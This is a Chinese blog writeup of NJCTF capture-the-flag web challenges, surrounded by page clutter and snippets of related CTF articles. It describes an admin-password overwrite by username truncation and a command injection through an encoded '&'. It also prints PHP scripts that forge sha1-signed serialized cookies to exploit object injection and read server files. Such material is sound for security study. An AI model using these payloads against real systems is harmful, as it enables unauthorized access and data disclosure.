NJCTF writeup

最新推荐文章于 2022-11-13 13:36:33 发布
最新推荐文章于 2022-11-13 13:36:33 发布
阅读量5.3k 收藏 1
点赞数
分类专栏: WriteUp 文章标签: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ni9htMar3/article/details/66970006
版权

WEB

Login

打开是一个注册与登陆界面,随便注册一个账号然后抓包,发现必须是admin账号才会给flag
这样利用长度截取
这里写图片描述

用空格空出,超出注册用户名长度,然后后面跟一个1避免被函数消掉,这样我们就成功强行修改admin的密码为自己的密码
这里写图片描述

登陆即得flag

Get Flag

首先按照他所说的输入,会出现图片,并且格式是base64
这里写图片描述

然后随便输入
这里写图片描述

解密后发现执行的是cat命令
这里写图片描述

这样只要构造命令,先查看目录,然后cat就行
发现&是可以绕过,直接%26编码然后一直执行ls命令查找
这里写图片描述

发现目标

9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag

cat即可
这里写图片描述

Text wall

首先查找备份文件找到源码

<?php
$lists = [];
Class filelist{
   
    public function __toString()
    {
   
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
........
?>

通过抓包,将cookie解码一下,根据长度可知发现前面是sha1加密,后面是反序列化
这里写图片描述

这是属于PHP Object Injection范围,利用反序列化得到并伪造cookie,构造相同的类型

<?php
    Class filelist{
   
        public function __toString()
        {
   
            return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
        }
    }

    $a = new filelist();
    $a->source = 'index.php';
    $b= new filelist();
    $b->source=$a;
    $d=serialize($b);
    $e=sha1($d).$d;
    echo urlencode($e)."<br>";
?>

也可以用下面这种写法

<?php
    Class filelist{
   
        public function __toString()
        {
   
            return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
        }
    }

    $a = [];
    $b= new filelist();
    $b->source = 'index.php';
    $a[]=$b;
    $d=serialize($a);
    $e=sha1($d).$d;
    echo urlencode($e)."<br>";
?>

得到index.php的内容

233333333333333333333333333333333333333333333333333333333333333333 <?php
//The flag is /var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g
$lists = [];
Class filelist{
    
    public function __toString()
    {
    
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_COOKIE['lists'])){
    $cookie = $_COOKIE['lists'];
    $hash = substr($cookie, 0, 40);
    $sha1 = substr($cookie, 40);
    if(sha1($sha1) === $hash){
        $lists = unserialize($sha1);
    }
}
if(isset($_POST['hiehiehie'])){
    $info = $_POST['hiehiehie'];
    $lists[] = $info;
    $sha1 = serialize($lists);
    $hash = sha1($sha1);
    setcookie('lists', $hash.$sha1);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
  <title>Please Get Flag!!</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://apps.bdimg.com/libs/bootstrap/3.3.0/css/bootstrap.min.css">  
  <script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script>
  <script src="http://apps.bdimg.com/libs/bootstrap/3.3.0/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
    <div class="jumbotron">
        <h1>Please Get Flag!!</h1>
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 584
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
QCTF部分 writeup
蚁景网安学院
07-17 1437
点击上方蓝色字体,关注我们一、啰嗦两句人话没参加XMAN,但是水了一波QCTF,题目还可以,就是感觉这样题目对我们这些萌新来说是不是太不友好了,感觉收获还是蛮多的,现在来记录一下CTF的...
QCTF 2018线上赛 writeup
weixin_33896069的博客
07-16 649
本次算是被QCTF打趴了,本来做题时间就少(公司无限开会,开了一天,伪借口),加上难度和脑洞的增大,导致这次QCTF又酱油了。。。就连最基本的签到题都没做出来。。。这就很气 好了,以下是解题思路 MISC 0x01 X-man-A face 下载附件,得到图片 简单拖进binwalk扫一下,无果,查看附件属性信息,无果。 最后尝试补全一下图中的二维码 打开...
Xp0int2016新生杯CTF-writeup
sherlly666的博客
10-30 4331
先说说自己参加这次比赛的感受吧,虽然说只是一次校内的比赛,但是它于我的意义却远不止如此。CTF这个字眼,之前对于我来说一直是“可远观而不可亵玩焉”的感觉,这次算是初次接触,为期两周的比赛,从前端网页的基础知识到底层汇编、逆向、破解等,比赛所涉及的知识网络无疑是庞大的,可以说是自学效率最高的一次= =,话不多说,写了下wp,也算是记录一下这次经历吧。比赛地址:http://www.giantbranc
XCTF嘉年华 re1 Writeup
煮酒闲谈
10-17 1221
摘要CTF解题 > XCTF嘉年华体验赛>> re1Reverse 题目描述 Github https://github.com/Cherishaoit’s easy 文件后缀是个.ppp,感觉是个二进制文件,放到kali下查看一下(用file命令查看)。 root@kali:file 1bc87216-beb5-4e56-a7b5-2955d2a200b6.ppp由结果知,是一个32位
easyphp(xctf)
m0_56107268的博客
11-13 563
php一些函数的绕过
CTFSHOW PHP特性篇(上篇 89-110)
羽的博客
10-21 5589
web89 if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 考察点:数组绕过正则表达式 官方文档中如下介绍 返回值 返回完整匹配次数(可能是0),或者如果发生错误返回FALSE。 也就是说如果我们不按规定传一个字符串,
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3474
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshow(卷王杯)
qq_62046696的博客
09-24 1485
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
关于一个SQL注入题目的思考
12-14
p牛在群里面出了一个好玩的题目,正好晚上空虚寂寞冷,做一下暖暖身子,题目是: <?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code'); $table = addslashes($_GET['table']); $sql = "UPDATE `{$table}` SET `username`='admin' WHERE id=1"; if(!mysqli_query($link, $sql)) { echo(mysqli_error($link));
PHP三个常用的加密函数
BUG制造者:图图 <p>这是一个P标签</p>
05-19 1582
PHP加密函数—md5()函数加密实例用法 MD5()函数是计算器字符串的 MD5散列值,使用MD5的算法,MD5的全称是Message-Digest Algorithm 5,它的作用是把不同长度的数据信息经过一系列的算法计算成一个 128 位的数值,就是把一个任意长度的字节串变成一定长的大整数。注意这里说的是“字节串”,而不是“字符串”,因为这种变换只与字节的值有关系,与字符集或者编码方式并无关。 第二个参数如果设置为true,那么函数就会返回一个二进制形式的密文,该参数默认为 false。 在很.
ctfshow
charon145的博客
01-15 1283
第三题 抓包,获得flag
网络攻防期末大作业选题:防sql注入的登录网站【网络攻防CTF】(保姆级图文)
MZH
06-13 3393
期末大作业选题:放sql注入的登录网站【网络攻防CTF】(保姆级图文)
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
JCTF Writeup
weixin_34007886的博客
03-08 979
Sasiki · 2014/09/30 15:35SJTU 0ops - September 11, 2014赛题源代码:JCTF源码.zipRERE100扔给dex2jar+jdgui,在MainActivity里看到NzU2ZDJmYzg0ZDA3YTM1NmM4ZjY4ZjcxZmU3NmUxODk= 复制代码Base64解码为756d2fc84d07a356c8f68f71fe76e189...
【逆向学习】还是代码 writeup
charlie_heng的专栏
12-22 715
这是jctf2014的一道题首先用工具查出来关键的函数是sub_401430看了下,大概逻辑是用pass1对在0x422000地址一顿操作,具体操作是 取两个字节,比如说第三四个字节,0xc3,0x2 将0x2左移八位,然后加上0xc3,得到的结果传进sub_4011A0 sub_4011A0的参数有三个,第一个是上面得到的结果,第二个是pass1,第三个是1517 函数的代码如下 写段python
jctf2014RE200
计算机小白的博客
07-30 1545
拿到题以后放到IDA和OD中都没什么卵用,于是上网搜了一下,发现是PE头有问题,需要修改,于是放入Winhex中: DOS头的最后一个参数应该是指向PE头的位移,所以应该是E8,而PE头的起始位应该是50 45 00 00。修改以后保存,放入OD中,搜素字符串: 可以看到有个success应该就是成功的跳转,于是回车跳到那段程序,发现程序好长。。。汇编比较菜,果断放入IDA,搜素succes
【攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1311
题目 ---- FlatScience 一、writeup 二、知识点
iscc2015官方writeup
最新发布
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值